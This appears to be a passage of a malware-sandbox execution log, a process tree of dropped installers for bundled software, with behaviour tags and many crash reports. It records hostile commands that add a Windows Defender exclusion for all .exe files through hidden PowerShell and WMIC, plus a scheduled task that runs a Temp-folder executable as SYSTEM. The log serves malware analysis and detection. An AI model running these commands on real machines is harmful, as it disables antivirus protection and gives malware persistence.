C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --mojo-platform-channel-handle=3164 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2860
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --mojo-platform-channel-handle=4316 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1056
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --mojo-platform-channel-handle=4256 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4968
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --mojo-platform-channel-handle=4356 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2976
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --mojo-platform-channel-handle=4260 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:196
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=151 --mojo-platform-channel-handle=4148 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6052
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --mojo-platform-channel-handle=2400 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:2156
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --mojo-platform-channel-handle=4108 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1836
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --mojo-platform-channel-handle=4056 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:6004
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --mojo-platform-channel-handle=1280 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --mojo-platform-channel-handle=4432 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:5888
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --mojo-platform-channel-handle=4396 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:4112
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --mojo-platform-channel-handle=3660 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵PID:1036
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:5960 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:5788 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:5640 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:5380 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exeC:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe4⤵
- Executes dropped EXE
PID:6064 -
C:\Users\Admin\AppData\Local\Temp\is-NM97J.tmp\TVCwEHwXmrhkdZhEKh.tmp"C:\Users\Admin\AppData\Local\Temp\is-NM97J.tmp\TVCwEHwXmrhkdZhEKh.tmp" /SL5="$20396,4415326,54272,C:\Users\Admin\AppData\Local\Temp\XY5cJ0q5\TVCwEHwXmrhkdZhEKh.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5208 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -i6⤵
- Executes dropped EXE
PID:2012 -
C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe"C:\Users\Admin\AppData\Local\Free Video Player\freevideoplayer.exe" -s6⤵
- Executes dropped EXE
PID:492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22604⤵
- Program crash
PID:404 -
C:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exeC:\Users\Admin\AppData\Local\Temp\h2jPqaN0\bSWFf7XkEILq.exe --silent --allusers=04⤵
- Executes dropped EXE
PID:4448 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --silent --allusers=0 --server-tracking-blob=YmMwZGU2YjFhMjE3MTZiMzEwY2M0NzBlZTIxNGFhNDcwNTg0YzMxOTI2ZmUxNGRkOGI3MDY4OThlMWQ4YjdhNTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjExMDY5MDIuMzA1NCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiZjkxODMwYzItOTFkNS00YTEwLWJkOWUtZjM5MDA3ZTEzMGU2In0=5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:5752 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x33c,0x340,0x344,0x318,0x348,0x71b8b1f4,0x71b8b200,0x71b8b20c6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5452 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5752 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240716051509" --session-guid=e1474dd1-4685-48e3-9e00-fdb95a4141cc --server-tracking-blob=MzkyMjU2OWQ5ODZmOTQwNjg2YWM2M2RhODc1MjQ3ODAyYjY2MTZiNTEzNWRkZDk2ZTQ4MjNlNDQzZTFhYzI1Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMTEwNjkwMi4zMDU0IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiJmOTE4MzBjMi05MWQ1LTRhMTAtYmQ5ZS1mMzkwMDdlMTMwZTYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C060000000000006⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS061095BA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x70ffb1f4,0x70ffb200,0x70ffb20c7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5464 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"6⤵
- Executes dropped EXE
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe" --version6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407160515091\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xa49f88,0xa49f94,0xa49fa07⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18844⤵
- Program crash
PID:896 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21764⤵
- Program crash
PID:5708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 16724⤵
- Program crash
PID:1912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21204⤵
- Program crash
PID:5212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21484⤵
- Program crash
PID:1868 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21764⤵
- Program crash
PID:1776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21484⤵
- Program crash
PID:6084 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19884⤵
- Program crash
PID:5368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19324⤵
- Program crash
PID:4736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18524⤵
- Program crash
PID:2628 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 21404⤵
- Program crash
PID:5356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe"4⤵PID:3124
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10804⤵
- Program crash
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exeC:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe /did=757674 /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:716 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:3824
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:1632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4144 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:5456 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe\" z0 /gWdidO 757674 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 8525⤵PID:1896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 18244⤵
- Program crash
PID:4512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19804⤵
- Program crash
PID:5468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 19644⤵
- Program crash
PID:2184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 22284⤵
- Program crash
PID:2168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11684⤵
- Program crash
PID:3336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 16924⤵
- Program crash
PID:4216 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 17644⤵
- Program crash
PID:864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 10764⤵PID:3696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 13884⤵PID:404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 11604⤵PID:2128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:3796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:2604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:3056
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:2840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:6140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:2168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5828 -ip 58281⤵PID:4900
-
